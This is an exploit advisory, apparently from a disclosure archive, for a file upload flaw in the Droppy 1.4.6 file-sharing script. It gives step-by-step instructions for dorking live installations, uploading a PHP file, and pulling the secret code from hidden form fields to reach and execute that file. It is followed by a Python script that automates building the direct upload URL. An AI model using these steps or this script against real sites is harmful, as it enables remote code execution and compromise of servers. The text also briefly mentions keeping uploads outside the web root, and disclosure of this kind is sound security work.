`============================================================================================================================
| # Title : Amazon S3 Droppy v 1.4.6 File Upload Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : https://codecanyon.net/item/droppy-online-file-sharing/10575317 |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Droppy is an online file sharing platform that can be used to share multiple files among friends,
family and colleagues. The files can be sent by e-mail or via a URL that can be shared with anyone you like.
[+] Find installations by dorking in Google or another search engine.
[+] Select the file Ev!l.php and send it to your e-mail address or as a direct link.
[+] The uploaded file can then be accessed remotely and its code executed.
[+] The script saves a copy of your file on the web server in the directory "uploads/", with a secret code prefixed to the file name.
[+] When you click the link to download your file, right-click and view the source of the download link page (not the page of your e-mail):
[+] Example: view-source:http://droppy.proxibolt.com/PrHEtFg
[+] The script stores the attached files inside the hosting server of the website.
It does not give you the storage path, but when you open the source code of the download page
you will find the secret code that forms part of the stored file name, so the file can be accessed remotely and run.
Line 100 contains the secret code generated randomly by the script, which renames the attached file
and stores it inside the folder. When you enter the storage path and combine the secret code with
the file name, the file opens for you from inside the server.
[+] Lines 99, 100, 101:
>
> <input type="hidden" name="action" id="action" value="download">
> <input type="hidden" name="secret_code" id="secret_code" value="c40c11023e25cb7cfcba1345c4e26f72">
> <input type="hidden" name="download_id" id="download_id" value="PrHEtFg">
>
[+] Combine the secret code with the name of your file to get a URL that gives you direct access:
[+] http://127.0.0.1/Droppy/uploads/c40c11023e25cb7cfcba1345c4e26f72-x.php
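The steps above can be automated once the download page's source is in hand. The following is an added example written for this page, not code from the advisory or from the Droppy project: it parses the three hidden inputs quoted above out of a constructed copy of that HTML, then builds the direct URL by joining the base URL, the "uploads/" directory the advisory names, the secret_code value and the original filename. The base URL http://127.0.0.1/Droppy/ and the filename x.php are taken from the advisory; that "uploads/" sits directly under the application root, and the list of extensions a PHP-enabled server would execute, are assumptions made for illustration.

```python
"""Rebuild the direct-access URL of a Droppy upload from the hidden form
fields on its download page, as the advisory describes.

Added example for this page; not code from the advisory or from Droppy.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample page: the three hidden inputs quoted in the advisory,
# with the same values, wrapped in a minimal form.
SAMPLE_PAGE = """
<form method="post">
<input type="hidden" name="action" id="action" value="download">
<input type="hidden" name="secret_code" id="secret_code" value="c40c11023e25cb7cfcba1345c4e26f72">
<input type="hidden" name="download_id" id="download_id" value="PrHEtFg">
</form>
"""


class HiddenInputs(HTMLParser):
    """Collect name -> value for every <input type="hidden"> in the page."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if a.get("type", "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value", "")


def hidden_fields(html):
    """Return the hidden form fields of a download page as a dict."""
    parser = HiddenInputs()
    parser.feed(html)
    return parser.fields


def direct_upload_url(base_url, html, uploaded_name, uploads_dir="uploads/"):
    """<base>/uploads/<secret_code>-<original filename>, per the advisory.

    uploads_dir is the directory the advisory names; that it sits directly
    under the application root is an assumption of this example.
    """
    fields = hidden_fields(html)
    secret = fields.get("secret_code")
    if not secret:
        raise ValueError("no secret_code hidden input found on this page")
    return urljoin(base_url, f"{uploads_dir}{secret}-{uploaded_name}")


# Assumed list of extensions a typical PHP-enabled web server would execute
# rather than serve as a download; this is what makes an upload like x.php
# dangerous when it is reachable under the web root.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def served_as_php(filename):
    """True if the stored filename would be handled by the PHP interpreter."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in EXECUTABLE_EXTENSIONS


if __name__ == "__main__":
    url = direct_upload_url("http://127.0.0.1/Droppy/", SAMPLE_PAGE, "x.php")
    print(url)
    print("download_id:", hidden_fields(SAMPLE_PAGE)["download_id"])
    print("would execute as PHP:", served_as_php("x.php"))
```

In practice the HTML would come from fetching the short link (the view-source URL in the advisory); here it is embedded so the example runs offline. The secret code is random and only disclosed through that page, which is why the script takes the page source rather than guessing it. On the defensive side, the same served_as_php check is the kind of test an upload handler should apply before writing anything under the web root, or the uploads directory should be kept outside it and served through a download script.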
====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================
`